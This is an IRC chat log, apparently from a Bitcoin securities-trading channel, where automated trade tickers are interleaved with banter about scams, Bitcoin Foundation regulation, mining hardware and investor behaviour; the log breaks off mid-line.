[BTCTC] [ACTIVEMINING] 30 @ 0.005542 = 0.1663 BTC [+] Aug 19 00:12:06 before they used to run their icbit / btcjam / w/e unheard of scams in anonimity. Aug 19 00:12:11 [BTCTC] [ACTIVEMINING] 30 @ 0.005542 = 0.1663 BTC [+] Aug 19 00:12:16 mircea_popescu: I would go as far (with truffles thought), that you can line up even a billion rich pseudo-smart idiots Aug 19 00:12:21 [HAVELOCK] [LABCO] 20 @ 0.001799 = 0.036 BTC [+] Aug 19 00:12:22 vis-a-vis your commentary on facebook Aug 19 00:12:30 perhaps. i made a commentary on facebook ? Aug 19 00:12:36 [BTCTC] [ACTIVEMINING] 30 @ 0.005542 = 0.1663 BTC [+] Aug 19 00:12:38 a a, you mean on as in about. Aug 19 00:12:43 yes. in your "Lets have fun with paul graham" Aug 19 00:12:46 ya Aug 19 00:12:57 Just because they lined up a billion idiots doesn't make it the perfect bad idea. Aug 19 00:13:06 same goes for say BTCGARDEN Aug 19 00:13:24 [BTCTC] [ACTIVEMINING] 30 @ 0.005408 = 0.1622 BTC [-] Aug 19 00:13:26 anyway. this shit smells pretty bad, there are people who suspect it's just governmental skirmishing Aug 19 00:13:30 preparing a regulatory swoop Aug 19 00:13:38 i have my doubts, but anyway, the cheek is incredible on the face. Aug 19 00:13:48 [BTCTC] [ACTIVEMINING] 30 @ 0.005408 = 0.1622 BTC [-] Aug 19 00:13:56 i mean, it's clearly one single group, just a few people. they have nothing at all. Aug 19 00:14:07 scammers usually aren't this brave. Aug 19 00:14:16 [BTCTC] [ACTIVEMINING] 30 @ 0.005408 = 0.1622 BTC [-] Aug 19 00:14:21 wasn't BTCGARDEN chinese? Aug 19 00:14:31 I wonder how USG would regulate chinese scammers... Aug 19 00:14:32 [BTCTC] [ACTIVEMINING] 30 @ 0.005408 = 0.1622 BTC [-] Aug 19 00:14:45 the usg does not ever regulate the miscreant. Aug 19 00:14:50 the usg regulates its own people. Aug 19 00:14:56 [BTCTC] [ACTIVEMINING] 30 @ 0.005408 = 0.1622 BTC [-] Aug 19 00:14:59 it's not the terrorists being felt up in airports, it's the citizenry. Aug 19 00:15:36 guess it would be the same approach they'll take for bitcoin Aug 19 00:15:55 "no investing unless you fill out these DMV forms" even though the DMV has nothing to do with the SEC Aug 19 00:15:55 the theory may have some merit. make a bunch fo scams, have them pop in concert, then come in "for the good of the industry" Aug 19 00:16:09 [BTCTC] [ACTIVEMINING] 30 @ 0.005543 = 0.1663 BTC [+] Aug 19 00:16:11 there's some groundwork being laid out already what with gavin's incredibly shitty move Aug 19 00:16:41 there's something to be said for the excellent timing : less than a week after I bitchslapped him there's suddenly supoenas everywhere. let's dillute it. Aug 19 00:16:54 ugh Aug 19 00:16:58 but adding all this together it still doesn't quite cut it. Aug 19 00:17:07 might as well be a bunch of ignorant kids, and therefore brave. Aug 19 00:17:13 bitcoin foundation "recommends" development in conjunction with US regulation Aug 19 00:17:17 yaya Aug 19 00:17:26 [BTCTC] [ACTIVEMINING] 30 @ 0.005543 = 0.1663 BTC [+] Aug 19 00:17:29 the schism that will cause will be something worth seeing Aug 19 00:17:36 [BTCTC] [ACTIVEMINING] 30 @ 0.005543 = 0.1663 BTC [+] Aug 19 00:17:39 you're seeing it. Aug 19 00:17:50 [BTCTC] [ACTIVEMINING] 30 @ 0.005543 = 0.1663 BTC [+] Aug 19 00:17:58 but back to the point of rich people not having the time. who has the time to put in core development of BTC? Aug 19 00:18:09 [BTCTC] [ACTIVEMINING] 30 @ 0.005543 = 0.1663 BTC [+] Aug 19 00:18:11 since when are rich people developers ?! Aug 19 00:18:22 smart* not rich sorry Aug 19 00:19:04 but it would seem all an entity need do, is get their hooks into the bitcoin foundation, and any interest they want put into bitcoin could be done Aug 19 00:19:07 open source no more Aug 19 00:19:15 [BTCTC] [ACTIVEMINING] 30 @ 0.005407 = 0.1622 BTC [-] Aug 19 00:19:17 hardly. Aug 19 00:19:29 im running 4.x Aug 19 00:19:38 [BTCTC] [ACTIVEMINING] 30 @ 0.005407 = 0.1622 BTC [-] Aug 19 00:19:46 deepbit iirc is running 3.x Aug 19 00:19:54 [BTCTC] [ACTIVEMINING] 30 @ 0.005407 = 0.1622 BTC [-] Aug 19 00:20:00 bitcoin is dead as an open source _development_ Aug 19 00:20:06 [BTCTC] [ACTIVEMINING] 30 @ 0.005407 = 0.1622 BTC [-] Aug 19 00:20:11 that happened a while back, anyway, probably right around the fork. Aug 19 00:20:22 [BTCTC] [ACTIVEMINING] 30 @ 0.005406 = 0.1622 BTC [-] Aug 19 00:20:51 [BTCTC] [BASIC-MINING] 1 @ 0.3089 BTC [-] Aug 19 00:21:10 [BTCTC] [ACTIVEMINING] 30 @ 0.005403 = 0.1621 BTC [-] Aug 19 00:21:28 [BTCTC] [BASIC-MINING] 1 @ 0.309 BTC [+] Aug 19 00:21:48 in other news, I went to a party friday night Aug 19 00:21:56 there was a 'bitcoin accepted here' sticker in teh kitchen Aug 19 00:22:10 any girls on their knees next to it ? Aug 19 00:22:24 [BTCTC] [ACTIVEMINING] 30 @ 0.005543 = 0.1663 BTC [+] Aug 19 00:22:29 very possibly, after I left Aug 19 00:22:41 there was rather a lot of lonesome tail around Aug 19 00:23:06 buttcoin wins the day! Aug 19 00:23:50 [BTCTC] [ACTIVEMINING] 30 @ 0.005543 = 0.1663 BTC [+] Aug 19 00:24:03 pretty cool shindig (hows that truffles?) though Aug 19 00:24:23 huge 60's porno palace left to decay Aug 19 00:25:00 that thing in oakland ? Aug 19 00:25:45 not a thing in oakland Aug 19 00:26:19 some chinese restaurant or w/e Aug 19 00:27:38 [HAVELOCK] [AM100] 10 @ 0.037 = 0.37 BTC [-] Aug 19 00:27:59 a house that should probably be worth in the vincinity of $10mn if it wasnt falling dowon Aug 19 00:28:29 [BTCTC] [ACTIVEMINING] 30 @ 0.005543 = 0.1663 BTC [+] Aug 19 00:28:45 [BTCTC] [BTC-BOND] 4 @ 0.009995 = 0.04 BTC [+] Aug 19 00:29:11 [HAVELOCK] [AM100] 5 @ 0.0369 = 0.1845 BTC [-] Aug 19 00:29:13 [HAVELOCK] [AM100] 19 @ 0.0368001 = 0.6992 BTC [-] Aug 19 00:29:16 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00119 = 0.0036 BTC [-] Aug 19 00:30:24 [BTCTC] [ACTIVEMINING] 30 @ 0.005542 = 0.1663 BTC [-] Aug 19 00:31:27 [BTCTC] [KENILWORTH] 6 @ 0.001623 = 0.0097 BTC [-] Aug 19 00:31:29 [BTCTC] [DMS.PURCHASE] 10 @ 0.0207 = 0.207 BTC [-] Aug 19 00:32:18 [BTCTC] [ASICMINER-PT] 1 @ 3.811 BTC [-] Aug 19 00:32:20 [BTCTC] [ASICMINER-PT] 1 @ 3.81 BTC [-] Aug 19 00:32:23 [BTCTC] [ACTIVEMINING] 3 @ 0.005604 = 0.0168 BTC [+] Aug 19 00:33:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00119 BTC [-] Aug 19 00:33:40 [HAVELOCK] [AM100] 15 @ 0.0368001 = 0.552 BTC [-] Aug 19 00:33:42 [HAVELOCK] [AM1] 8 @ 3.99 = 31.92 BTC [-] Aug 19 00:34:57 [HAVELOCK] [AM1] 1 @ 3.800111 BTC [-] Aug 19 00:34:59 [HAVELOCK] [AM1] 2 @ 3.80011 = 7.6002 BTC [-] Aug 19 00:35:02 [HAVELOCK] [AM1] 1 @ 3.8001 BTC [-] Aug 19 00:35:04 [HAVELOCK] [AM1] 2 @ 3.8 = 7.6 BTC [-] Aug 19 00:35:06 [HAVELOCK] [AM1] 3 @ 3.79000001 = 11.37 BTC [-] Aug 19 00:35:08 [HAVELOCK] [AM1] 3 @ 3.78 = 11.34 BTC [-] Aug 19 00:35:10 [HAVELOCK] [AM1] 1 @ 3.77 BTC [-] Aug 19 00:35:12 [HAVELOCK] [AM1] 3 @ 3.77 = 11.31 BTC [-] Aug 19 00:35:14 [HAVELOCK] [AM1] 1 @ 3.7601 BTC [-] Aug 19 00:40:34 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:40:53 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:41:09 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:41:35 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:42:12 [BTCTC] [ACTIVEMINING] 15 @ 0.005409 = 0.0811 BTC [-] Aug 19 00:42:58 [BTCTC] [ACTIVEMINING] 6 @ 0.005409 = 0.0325 BTC [-] Aug 19 00:44:23 [BTCTC] [ACTIVEMINING] 6 @ 0.005409 = 0.0325 BTC [-] Aug 19 00:44:42 [BTCTC] [ACTIVEMINING] 5 @ 0.00541 = 0.0271 BTC [+] Aug 19 00:44:56 [BTCTC] [BTC-GROWTH] 5 @ 0.1009 = 0.5045 BTC [+] Aug 19 00:46:42 [BTCTC] [ASICMINER-PT] 3 @ 3.8 = 11.4 BTC [-] Aug 19 00:47:13 [BTCTC] [ASICMINER-PT] 1 @ 3.79 BTC [-] Aug 19 00:47:17 [\\\]: 6e9ef09be6e7ac0be4e9079f00947756076e62c6b17048b90c235ca219f8156b Aug 19 00:47:22 that should be that Aug 19 00:47:30 [HAVELOCK] [AM100] 1 @ 0.0382 BTC [+] Aug 19 00:47:44 [BTCTC] [ASICMINER-PT] 1 @ 3.761 BTC [-] Aug 19 00:47:44 [HAVELOCK] [XBOND] 3 @ 0.0010901 = 0.0033 BTC [-] Aug 19 00:47:47 [BTCTC] [ASICMINER-PT] 1 @ 3.76 BTC [-] Aug 19 00:47:48 [BTCTC] [ASICMINER-PT] 2 @ 3.759 = 7.518 BTC [-] Aug 19 00:47:49 [BTCTC] [ASICMINER-PT] 1 @ 3.758 BTC [-] Aug 19 00:47:54 [HAVELOCK] [XBOND] 1 @ 0.00109005 BTC [-] Aug 19 00:48:03 [HAVELOCK] [AM100] 1 @ 0.0382 BTC [+] Aug 19 00:48:14 [BTCTC] [ASICMINER-PT] 2 @ 3.759 = 7.518 BTC [+] Aug 19 00:51:40 [BTCTC] [LABCOIN] 15 @ 0.001697 = 0.0255 BTC [+] Aug 19 00:51:45 [BTCTC] [LABCOIN] 20 @ 0.001698 = 0.034 BTC [+] Aug 19 00:51:46 [BTCTC] [LABCOIN] 465 @ 0.0017 = 0.7905 BTC [+] Aug 19 00:52:29 [HAVELOCK] [AM100] 20 @ 0.038 = 0.76 BTC [-] Aug 19 00:52:49 [BTCTC] [LABCOIN] 176 @ 0.0017 = 0.2992 BTC [+] Aug 19 00:52:50 [HAVELOCK] [AM100] 3 @ 0.0381999 = 0.1146 BTC [+] Aug 19 00:53:11 [HAVELOCK] [AM100] 19 @ 0.0370002 = 0.703 BTC [-] Aug 19 00:53:24 [HAVELOCK] [AM100] 10 @ 0.0370001 = 0.37 BTC [-] Aug 19 00:53:37 [HAVELOCK] [AM100] 5 @ 0.037 = 0.185 BTC [-] Aug 19 00:53:39 [HAVELOCK] [AM100] 3 @ 0.037 = 0.111 BTC [-] Aug 19 00:54:00 [HAVELOCK] [AM100] 5 @ 0.0369 = 0.1845 BTC [-] Aug 19 00:54:03 [HAVELOCK] [AM100] 5 @ 0.0368001 = 0.184 BTC [-] Aug 19 00:54:05 [HAVELOCK] [AM100] 5 @ 0.0368 = 0.184 BTC [-] Aug 19 00:54:07 [HAVELOCK] [AM100] 5 @ 0.0367 = 0.1835 BTC [-] Aug 19 00:54:10 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [+] Aug 19 00:54:22 [HAVELOCK] [AM100] 2 @ 0.03666 = 0.0733 BTC [-] Aug 19 00:54:50 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.001198 = 0.006 BTC [+] Aug 19 00:57:18 [BTCTC] [LABCOIN] 20 @ 0.001709 = 0.0342 BTC [+] Aug 19 00:57:51 [BTCTC] [LABCOIN] 30 @ 0.00171 = 0.0513 BTC [+] Aug 19 00:58:46 [BTCTC] [LABCOIN] 5 @ 0.0017 = 0.0085 BTC [-] Aug 19 01:00:24 [BTCTC] [LABCOIN] 20 @ 0.001699 = 0.034 BTC [-] Aug 19 01:01:50 [BTCTC] [LABCOIN] 20 @ 0.001681 = 0.0336 BTC [-] Aug 19 01:01:52 [BTCTC] [LABCOIN] 1 @ 0.001665 BTC [-] Aug 19 01:01:53 [BTCTC] [LABCOIN] 749 @ 0.00166 = 1.2433 BTC [-] Aug 19 01:02:02 [BTCTC] [LABCOIN] 450 @ 0.0017 = 0.765 BTC [+] Aug 19 01:04:16 [BTCTC] [LABCOIN] 5 @ 0.0017 = 0.0085 BTC [+] Aug 19 01:05:43 what are your opinions on BTC-GROWTH fund on BTC-TC Aug 19 01:05:58 ehh Aug 19 01:06:01 guy seems ok Aug 19 01:06:37 and no PMB's that aren't currently hashing Aug 19 01:07:03 .d Aug 19 01:07:04 50810339.04828 | Next Diff in 1112 blocks | Estimated Change: 21.6755% in 6d 1h 1m 19s Aug 19 01:07:11 ;;nethash Aug 19 01:07:11 484562.849307 Aug 19 01:07:21 pmb's are doomed to drop in price at the moment Aug 19 01:07:39 despite speculators trying desperately to prop up the bottom line Aug 19 01:07:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.03705 = 0.3705 BTC [-] Aug 19 01:08:29 [BTCTC] [TAT.ASICMINER] 25 @ 0.03705 = 0.9263 BTC [-] Aug 19 01:09:08 !last DMS.SELLING Aug 19 01:09:10 It's so strange that you don't remember any of your poetry. Aug 19 01:09:12 !last btctc DMS.SELLING Aug 19 01:09:13 Last trade for DMS.SELLING on BTCTC was at 0.01783 BTC [+] Aug 19 01:09:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.03755 = 0.1127 BTC [+] Aug 19 01:09:51 [BTCTC] [TAT.ASICMINER] 7 @ 0.03756 = 0.2629 BTC [+] Aug 19 01:10:15 [BTCTC] [COGNITIVE] 1 @ 0.394 BTC [-] Aug 19 01:11:14 Does anyone else think ICEDRILL.ASIC seems riskier than other things? Aug 19 01:11:34 [BTCTC] [CB.IDIFF-O] 39 @ 0.009749 = 0.3802 BTC [+] Aug 19 01:13:01 [BTCTC] [BTC-GROWTH] 2 @ 0.1008 = 0.2016 BTC [-] Aug 19 01:13:50 !last ICEDRILL,ASIC Aug 19 01:13:51 Have you got any tobacco? Aug 19 01:14:06 !last ICEDRILL.ASIC Aug 19 01:14:06 I don't give a shit who saw what and who did what or who did who. Aug 19 01:16:27 dddbtc: you gotta add the exchange Aug 19 01:16:29 !help Aug 19 01:16:30 List of commands: Aug 19 01:16:31 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} Aug 19 01:16:32 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} Aug 19 01:16:33 !mp (desc: returns the response from MPEX order) Aug 19 01:16:34 !rules (desc: chan guidelines) {short: !r} Aug 19 01:16:35 !exchanges (desc: lists exchanges and brokers) {short: !e} Aug 19 01:16:45 !exchanges Aug 19 01:17:20 !e Aug 19 01:17:30 assbot will pm you Aug 19 01:17:56 wtb ltc-global assbot Aug 19 01:18:23 [HAVELOCK] [AM100] 3 @ 0.0373 = 0.1119 BTC [+] Aug 19 01:18:45 [HAVELOCK] [AM100] 1 @ 0.0370001 BTC [-] Aug 19 01:23:02 !exchanges Aug 19 01:30:12 [BTCTC] [DMS.MINING] 22 @ 0.003399 = 0.0748 BTC [-] Aug 19 01:30:35 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [+] Aug 19 01:30:37 ;;calc 333 - 80 Aug 19 01:30:37 253 Aug 19 01:30:57 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [+] Aug 19 01:31:07 [BTCTC] [ACTIVEMINING] 30 @ 0.005532 = 0.166 BTC [+] Aug 19 01:31:29 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [-] Aug 19 01:32:09 .d Aug 19 01:32:10 50810339.04828 | Next Diff in 1110 blocks | Estimated Change: 21.4447% in 6d 1h 16m 45s Aug 19 01:32:28 [BTCTC] [DMS.MINING] 5 @ 0.0034 = 0.017 BTC [+] Aug 19 01:32:38 ;;nethash Aug 19 01:32:39 484562.849307 Aug 19 01:33:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [-] Aug 19 01:44:07 [HAVELOCK] [XBOND] 4 @ 0.001177 = 0.0047 BTC [+] Aug 19 01:44:51 [HAVELOCK] [XBOND] 78 @ 0.001177 = 0.0918 BTC [+] Aug 19 01:49:16 [HAVELOCK] [AM100] 2 @ 0.038 = 0.076 BTC [+] Aug 19 01:52:20 [BTCTC] [DMS.MINING] 1 @ 0.003205 BTC [-] Aug 19 01:52:21 [BTCTC] [DMS.MINING] 34 @ 0.003205 = 0.109 BTC [-] Aug 19 01:52:40 .d Aug 19 01:52:41 50810339.04828 | Next Diff in 1107 blocks | Estimated Change: 21.4883% in 6d 0h 49m 51s Aug 19 01:57:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.03746 BTC [-] Aug 19 02:03:09 [BTCTC] [DMS.MINING] 3 @ 0.003205 = 0.0096 BTC [-] Aug 19 02:03:44 [BTCTC] [DMS.SELLING] 1 @ 0.01782 BTC [-] Aug 19 02:05:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.03745 = 0.1124 BTC [-] Aug 19 02:05:37 [BTCTC] [TAT.ASICMINER] 50 @ 0.03745 = 1.8725 BTC [-] Aug 19 02:06:57 [BTCTC] [ACTIVEMINING] 68 @ 0.005495 = 0.3737 BTC [-] Aug 19 02:06:58 [BTCTC] [ACTIVEMINING] 50 @ 0.005504 = 0.2752 BTC [+] Aug 19 02:06:58 [BTCTC] [ACTIVEMINING] 50 @ 0.005555 = 0.2778 BTC [+] Aug 19 02:07:00 [BTCTC] [ACTIVEMINING] 30 @ 0.005494 = 0.1648 BTC [-] Aug 19 02:07:01 [BTCTC] [ACTIVEMINING] 5 @ 0.00561 = 0.0281 BTC [+] Aug 19 02:10:03 [HAVELOCK] [XBOND] 20 @ 0.001175 = 0.0235 BTC [-] Aug 19 02:10:38 [HAVELOCK] [XBOND] 12 @ 0.001175 = 0.0141 BTC [-] Aug 19 02:10:56 [BTCTC] [ACTIVEMINING] 30 @ 0.0056 = 0.168 BTC [-] Aug 19 02:10:57 [BTCTC] [ACTIVEMINING] 66 @ 0.005601 = 0.3697 BTC [+] Aug 19 02:10:58 [BTCTC] [ACTIVEMINING] 50 @ 0.005602 = 0.2801 BTC [+] Aug 19 02:11:19 [BTCTC] [KENILWORTH] 4 @ 0.001623 = 0.0065 BTC [-] Aug 19 02:11:21 [BTCTC] [KENILWORTH] 3000 @ 0.001622 = 4.866 BTC [-] Aug 19 02:11:46 [HAVELOCK] [SDSTM] 5 @ 0.00623 = 0.0312 BTC [+] Aug 19 02:12:02 [HAVELOCK] [SDSTM] 15 @ 0.0062395 = 0.0936 BTC [+] Aug 19 02:12:15 [HAVELOCK] [SDSTM] 28 @ 0.0062629 = 0.1754 BTC [+] Aug 19 02:12:25 [BTCTC] [KENILWORTH] 10 @ 0.001622 = 0.0162 BTC [-] Aug 19 02:12:27 [BTCTC] [KENILWORTH] 500 @ 0.001621 = 0.8105 BTC [-] Aug 19 02:12:28 [BTCTC] [KENILWORTH] 424 @ 0.00162 = 0.6869 BTC [-] Aug 19 02:16:45 [BTCTC] [BTC-BOND] 1 @ 0.009995 BTC [+] Aug 19 02:22:30 [BTCTC] [LABCOIN] 170 @ 0.0017 = 0.289 BTC [+] Aug 19 02:22:31 [BTCTC] [LABCOIN] 1 @ 0.0017 BTC [+] Aug 19 02:22:32 [BTCTC] [LABCOIN] 1080 @ 0.0017 = 1.836 BTC [+] Aug 19 02:36:47 [BTCTC] [ACTIVEMINING] 30 @ 0.005489 = 0.1647 BTC [-] Aug 19 02:36:49 [BTCTC] [ACTIVEMINING] 5 @ 0.00549 = 0.0275 BTC [+] Aug 19 02:37:07 [HAVELOCK] [XBOND] 2 @ 0.0011711 = 0.0023 BTC [-] Aug 19 02:45:12 [BTCTC] [BASIC-MINING] 1 @ 0.29 BTC [-] Aug 19 02:52:13 [BTCTC] [ACTIVEMINING] 30 @ 0.005404 = 0.1621 BTC [-] Aug 19 02:52:14 [BTCTC] [ACTIVEMINING] 68 @ 0.005403 = 0.3674 BTC [-] Aug 19 02:52:15 [BTCTC] [ACTIVEMINING] 400 @ 0.005401 = 2.1604 BTC [-] Aug 19 02:52:16 [BTCTC] [ACTIVEMINING] 2 @ 0.0054 = 0.0108 BTC [-] Aug 19 02:52:17 [BTCTC] [ACTIVEMINING] 500 @ 0.005397 = 2.6985 BTC [-] Aug 19 03:00:52 [BTCTC] [LABCOIN] 70 @ 0.001685 = 0.118 BTC [-] Aug 19 03:15:35 [BTCTC] [ACTIVEMINING] 30 @ 0.005465 = 0.164 BTC [+] Aug 19 03:15:36 [BTCTC] [ACTIVEMINING] 2 @ 0.005466 = 0.0109 BTC [+] Aug 19 03:22:13 [BTCTC] [BTC-GROWTH] 20 @ 0.1009 = 2.018 BTC [+] Aug 19 03:24:12 [BTCTC] [ACTIVEMINING] 30 @ 0.005478 = 0.1643 BTC [+] Aug 19 03:24:13 [BTCTC] [ACTIVEMINING] 4 @ 0.005478 = 0.0219 BTC [+] Aug 19 03:24:15 [BTCTC] [ACTIVEMINING] 68 @ 0.005479 = 0.3726 BTC [+] Aug 19 03:24:16 [BTCTC] [ACTIVEMINING] 2 @ 0.0055 = 0.011 BTC [+] Aug 19 03:27:41 .d Aug 19 03:27:42 50810339.04828 | Next Diff in 1092 blocks | Estimated Change: 22.0919% in 5d 21h 37m 2s Aug 19 03:30:28 [BTCTC] [BTC-GROWTH] 25 @ 0.1003 = 2.5075 BTC [-] Aug 19 03:32:56 [BTCTC] [DMS.MINING] 10 @ 0.003325 = 0.0333 BTC [+] Aug 19 03:36:26 [BTCTC] [ACTIVEMINING] 30 @ 0.005583 = 0.1675 BTC [+] Aug 19 03:36:27 [BTCTC] [ACTIVEMINING] 24 @ 0.005599 = 0.1344 BTC [+] Aug 19 03:36:29 [BTCTC] [ACTIVEMINING] 6 @ 0.005599 = 0.0336 BTC [+] Aug 19 03:40:28 kleeck: you should really buy some better shills, vbs is slipping Aug 19 03:41:00 I am? Aug 19 03:41:26 [BTCTC] [DMS.MINING] 16 @ 0.003325 = 0.0532 BTC [+] Aug 19 03:43:14 Vbs: our bfl monarch trolling is weak Aug 19 03:43:30 pics dont show power connects, must mean they dont exist Aug 19 03:43:33 our? Aug 19 03:43:37 your* Aug 19 03:44:04 no, I'm pretty sure they'll exist Aug 19 03:44:07 existing single dissipates 350w btw Aug 19 03:44:31 ^ try doing it in an EE card btw Aug 19 03:44:58 if you can, sell the design to AMD/nVidia Aug 19 03:45:04 they'll make you rich Aug 19 03:45:40 I'd be surprised if 5970 wasnt pusing that Aug 19 03:47:00 5970 TDP is 294W Aug 19 03:47:05 http://www.anandtech.com/show/2877 Aug 19 03:47:08 AnandTech | The Radeon HD 5970: Completing AMD's Takeover of the High End GPU Market Aug 19 03:47:25 stock maybe Aug 19 03:47:35 not far off at any rate Aug 19 03:48:03 anyway, just pointing out a couple of flaws in your rampant scam shilling, carry on Aug 19 03:48:13 show me 3 running inside a case Aug 19 03:48:35 [MPEX] [S.MPOE] 7100 @ 0.00083789 = 5.949 BTC [-] Aug 19 03:48:53 not far off? 50W is "near"? loool Aug 19 03:49:20 [BTCTC] [DMS.MINING] 38 @ 0.003325 = 0.1264 BTC [+] Aug 19 03:49:41 I've had close to 1100w inside a case Aug 19 03:49:53 with shitty 5850s Aug 19 03:50:21 [BTCTC] [BTC-GROWTH] 127 @ 0.1003 = 12.7381 BTC [-] Aug 19 03:50:23 [BTCTC] [BTC-GROWTH] 25 @ 0.1002 = 2.505 BTC [-] Aug 19 03:50:25 [BTCTC] [BTC-GROWTH] 1 @ 0.1001 BTC [-] Aug 19 03:50:25 [BTCTC] [BTC-GROWTH] 26 @ 0.1 = 2.6 BTC [-] Aug 19 03:50:27 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 19 03:50:28 [BTCTC] [DMS.SELLING] 19 @ 0.0174 = 0.3306 BTC [-] Aug 19 03:50:29 [BTCTC] [BTC-GROWTH] 221 @ 0.1 = 22.1 BTC [-] Aug 19 03:50:30 [BTCTC] [DMS.SELLING] 81 @ 0.01735 = 1.4054 BTC [-] Aug 19 03:51:03 1100W with 5850? how many? Aug 19 03:51:12 [BTCTC] [LABCOIN] 1 @ 0.00168 BTC [-] Aug 19 03:51:13 [BTCTC] [LABCOIN] 1 @ 0.001662 BTC [-] Aug 19 03:51:15 [BTCTC] [LABCOIN] 1 @ 0.001661 BTC [-] Aug 19 03:51:35 bcoinnews.com Aug 19 03:51:48 lulz bgl youtube Aug 19 03:51:52 bfl Aug 19 03:53:25 dub: https://bitcointalk.org/index.php?topic=276692.msg2954571#msg2954571 Aug 19 03:54:33 [BTCTC] [LABCOIN] 30 @ 0.001672 = 0.0502 BTC [+] Aug 19 03:54:35 [BTCTC] [LABCOIN] 85 @ 0.001671 = 0.142 BTC [-] Aug 19 03:54:36 [BTCTC] [LABCOIN] 20 @ 0.001667 = 0.0333 BTC [-] Aug 19 03:55:20 [BTCTC] [LABCOIN] 85 @ 0.001664 = 0.1414 BTC [-] Aug 19 03:59:07 [BTCTC] [HOSTED-MINING] 1 @ 0.28 BTC Aug 19 04:01:30 [BTCTC] [DMS.MINING] 10 @ 0.003325 = 0.0333 BTC [+] Aug 19 04:02:17 .d Aug 19 04:02:18 50810339.04828 | Next Diff in 1090 blocks | Estimated Change: 21.8758% in 5d 21h 40m 15s Aug 19 04:02:35 moot point, who the fuck would buy from BFL ever again anyways? Aug 19 04:02:40 lolol the implied value of pmbs is completely overvalued Aug 19 04:03:03 [BTCTC] [HOSTED-MINING] 8 @ 0.28 = 2.24 BTC Aug 19 04:03:27 Duffer1: do you really read the forums these days? Aug 19 04:03:38 someone posted a link hehe Aug 19 04:04:05 People doing "business" on a forum is pretty sketchy if you really think about it. Aug 19 04:04:40 i actually like that change, it's an evolution of the standard trade paradigm Aug 19 04:05:34 [BTCTC] [BTC-GROWTH] 179 @ 0.1 = 17.9 BTC [-] Aug 19 04:05:37 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [-] Aug 19 04:05:40 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 19 04:05:41 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 19 04:05:43 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 19 04:08:22 [BTCTC] [HOSTED-MINING] 1 @ 0.28 BTC Aug 19 04:10:16 [HAVELOCK] [XBOND] 2 @ 0.001171 = 0.0023 BTC [-] Aug 19 04:12:02 [BTCTC] [HOSTED-MINING] 100 @ 0.28 = 28 BTC Aug 19 04:14:38 Vbs: i don't see anything there, you found another dog to bark at traffic with you? Aug 19 04:14:53 [BTCTC] [DMS.PURCHASE] 489 @ 0.0207 = 10.1223 BTC [-] Aug 19 04:15:09 dub: rauf!! rauf!! Aug 19 04:16:18 [BTCTC] [DMS.MINING] 50 @ 0.003395 = 0.1698 BTC [+] Aug 19 04:16:21 at least the 'just ignore everyone with anime avatars' thing is holding Aug 19 04:17:02 [BTCTC] [DMS.MINING] 346 @ 0.003325 = 1.1505 BTC [-] Aug 19 04:17:03 [BTCTC] [DMS.MINING] 63 @ 0.003205 = 0.2019 BTC [-] Aug 19 04:17:04 [BTCTC] [DMS.MINING] 1 @ 0.003205 BTC [-] Aug 19 04:17:05 [BTCTC] [DMS.MINING] 2 @ 0.003204 = 0.0064 BTC [-] Aug 19 04:17:06 [BTCTC] [DMS.MINING] 6 @ 0.003202 = 0.0192 BTC [-] Aug 19 04:17:07 [BTCTC] [DMS.MINING] 18 @ 0.003201 = 0.0576 BTC [-] Aug 19 04:17:08 [BTCTC] [DMS.MINING] 10 @ 0.0032 = 0.032 BTC [-] Aug 19 04:17:09 [BTCTC] [DMS.MINING] 43 @ 0.0032 = 0.1376 BTC [-] Aug 19 04:17:54 [BTCTC] [LABCOIN] 30 @ 0.001663 = 0.0499 BTC [-] Aug 19 04:18:57 Duffer1: Seriously bro? You would give someone millions of dollars because they post well on a forum? Those are the worst investors. Lemmings lining up to just hand money away. Aug 19 04:19:07 [BTCTC] [BTC-GROWTH] 5 @ 0.09999 = 0.5 BTC [-] Aug 19 04:23:56 [BTCTC] [BTC-GROWTH] 24 @ 0.1 = 2.4 BTC [+] Aug 19 04:26:45 [MPEX] [S.MPOE] 5200 @ 0.00083789 = 4.357 BTC [-] Aug 19 04:26:47 [MPEX] [S.MPOE] 2900 @ 0.00083485 = 2.4211 BTC [-] Aug 19 04:27:31 [BTCTC] [ACTIVEMINING] 1 @ 0.005594 BTC [-] Aug 19 04:27:43 [BTCTC] [HOSTED-MINING] 33 @ 0.28 = 9.24 BTC Aug 19 04:27:44 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.001198 = 0.0144 BTC [+] Aug 19 04:27:45 [BTCTC] [TAT.VIRTUALMINE] 118 @ 0.001198 = 0.1414 BTC [+] Aug 19 04:29:24 thestringpuller: to be honest Aug 19 04:29:28 I wish I had all of those for investors Aug 19 04:29:41 as long as their money is with me, its not being wasted by scammers Aug 19 04:30:06 you never answered why mircea_popescu would disagree based on his bitcoin drama timeline Aug 19 04:31:06 and still no answer arises, mr. sketchy man Aug 19 04:31:15 [BTCTC] [TAT.ASICMINER] 13 @ 0.03756 = 